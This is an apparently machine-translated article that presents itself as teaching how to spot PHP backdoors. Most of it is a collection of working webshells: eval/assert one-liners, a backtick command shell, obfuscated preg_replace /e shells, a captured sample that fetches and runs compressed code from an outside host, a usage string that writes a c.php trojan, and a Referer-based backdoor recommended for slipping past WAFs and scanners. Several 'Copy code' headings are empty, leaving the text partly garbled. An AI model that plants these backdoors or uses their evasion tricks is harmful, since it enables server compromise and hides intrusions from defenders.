Teach you to identify simple PHP backdoors without checking and killing_php skills

One of the most common one-sentence backdoors might be written like this

<&#63;php @eval($_POST['cmd']);&#63;>

or this

<&#63;php @assert($_POST['cmd']);&#63;>

Student tudouya gave [a construction technique] on FREEBUF using

Copy code The code is as follows:

Construction generation, of course, if it is too intuitive, you can write it like this

Copy code The code is as follows:

Then fill in some ordinary code to disguise it, and a simple "anti-kill" shell sample appears

Let’s take a look at what is known as the easiest PHP backdoor in history

Go directly to the code:

<&#63;php
 
$c=urldecode($_GET['c']);if($c){`$c`;}//完整
 
!$_GET['c']||`{$_GET['c']}`;//精简
 
/*******************************************************
 * 原理：PHP中``符号包含会当作系统命令执行
 * 示例：http://host/&#63;c=type%20config.php>config.txt
 *    然后就可以下载config.txt查看内容了！
 *    可以试试更变态的命令，不要干坏事哦！
 *******************************************************/

The implementation principle is that PHP will directly parse the content contained in the ` symbol (note: not single quotes) into system commands for execution! This way you can expand freely and abnormally!

Let’s look at the same simple piece of code

<&#63;php 
preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft"); 
&#63;> 

Password page

Recently captured a webshell sample based on PHP. Its ingenious dynamic code generation method and cumbersome self-page disguise method made us feel a lot of fun in the process of analyzing this sample. Next, let us enjoy this wonderful Webshell together.

Webshell code is as follows:

<&#63;php
error_reporting(0);
session_start();
header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))
$_SESSION['api']=substr(file_get_contents(
sprintf('%s&#63;%s',pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);
@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
&#63;>

The key is to look at the following code,

Copy code The code is as follows:

sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())

After execution here, it is actually a picture. The decrypted picture address is as follows:

http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85
Then call the file_get_contents function to read the image into a string, then substr takes the content after 3649 bytes, and then call gzuncompress to decompress to get the real code. Finally, the modifier e of preg_replace is called to execute the malicious code. Execute the following statement here to restore the malicious sample code,

Copy code The code is as follows:

echo gzuncompress(substr(file_get_contents(sprintf('%s?%s',pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649));
?>

Hide PHP without features in one sentence:

   <&#63;php 
session_start(); 
$_POST [ 'code' ] && $_SESSION [ 'theCode' ] = trim( $_POST [ 'code' ]); 
$_SESSION [ 'theCode' ]&&preg_replace( '\'a\'eis' , 'e' . 'v' . 'a' . 'l' . '(base64_decode($_SESSION[\'theCode\']))' , 'a' ); 
&#63;>
 

Assign the content of $_POST['code'] to $_SESSION['theCode'], and then execute $_SESSION['theCode']. The highlight is that there is no feature code. If you use a scanning tool to check the code, it will not alarm you, which is the purpose.
Super hidden PHP backdoor:

<&#63;php $_GET [a]( $_GET [b]);&#63;>

Just using the GET function constitutes a Trojan horse;
How to use:
​ ?a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};

After execution, the current directory will generate a c.php Trojan with one sentence. When the parameter a is eval, an error will be reported that the Trojan generation failed. When it is assert, the same error will be reported, but the Trojan will be generated. It is really not to be underestimated. It is a simple sentence. , is extended to such applications.
Hierarchical request, coded to run PHP backdoor:
This method is implemented in two files, file 1

 <&#63;php 
//1.php 
header( 'Content-type:text/html;charset=utf-8' ); 
parse_str ( $_SERVER [ 'HTTP_REFERER' ], $a ); 
if (reset( $a ) == '10' && count ( $a ) == 9) { 
eval ( base64_decode ( str_replace ( " " , "+" , implode( array_slice ( $a , 6))))); 
} 

&#63;>

File 2

 <&#63;php 
//2.php 
header( 'Content-type:text/html;charset=utf-8' ); 
//要执行的代码 
$code = <<<CODE 
phpinfo(); 
CODE; 
//进行base64编码 
$code = base64_encode ( $code ); 
//构造referer字符串 
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=" ; 
//后门url 
$url = 'http://localhost/test1/1.php ' ; 
$ch = curl_init(); 
$options = array ( 
CURLOPT_URL => $url , 
CURLOPT_HEADER => FALSE, 
CURLOPT_RETURNTRANSFER => TRUE, 
CURLOPT_REFERER => $referer
); 
curl_setopt_array( $ch , $options ); 
echocurl_exec( $ch ); 

&#63;>

Use HTTP_REFERER in the HTTP request to run the base64-encoded code to achieve the backdoor effect. Generally, WAF has a looser or no detection of referer. It is good to use this idea to bypass waf.

We treat these PHP backdoor programs with a learning attitude. Many PHP backdoor codes let us see how well-intentioned the programmers are.